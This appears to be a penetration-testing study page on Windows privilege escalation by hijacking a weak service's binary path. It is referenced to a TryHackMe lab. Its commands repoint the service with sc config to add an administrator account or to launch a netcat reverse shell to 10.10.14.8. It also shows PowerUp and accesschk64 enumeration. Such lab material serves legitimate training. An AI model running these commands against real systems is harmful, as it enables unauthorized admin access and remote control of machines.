> For the complete documentation index, see [llms.txt](https://pnpt.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pnpt.adot8.com/windows-privilege-escalation/service-permissions/binary-paths.md).

# Binary Paths

## Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the **binary path** (executable file) to a malicious one.

## Exploitation using PowerUp

#### Run PowerUp on machine

```powerquery
. .\PowerUp.ps1
Invoke-AllChecks
```

<figure><img src="/files/9OyK3ubE3rgWjbQHj4qQ" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Change the binary path

```powerquery
sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" 
```

#### Start service

```powerquery
sc start dacl 
```

## Exploitation via Accesschk64

#### Check for services with write permissions

```
accesschk64.exe --accept-eula -uwcv Everyone *
```

<figure><img src="/files/Zj5d3eQv0PFDyZn25C46" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

```
accesschk64.exe -uwcv daclsvc
```

<figure><img src="/files/Azm098szRD9lItKXsNra" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Query the service

```powerquery
sc qc daclsvc
```

<figure><img src="/files/I7VhqgAYTcqeIH4PRRr7" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Changing the binary path is the same as the last method
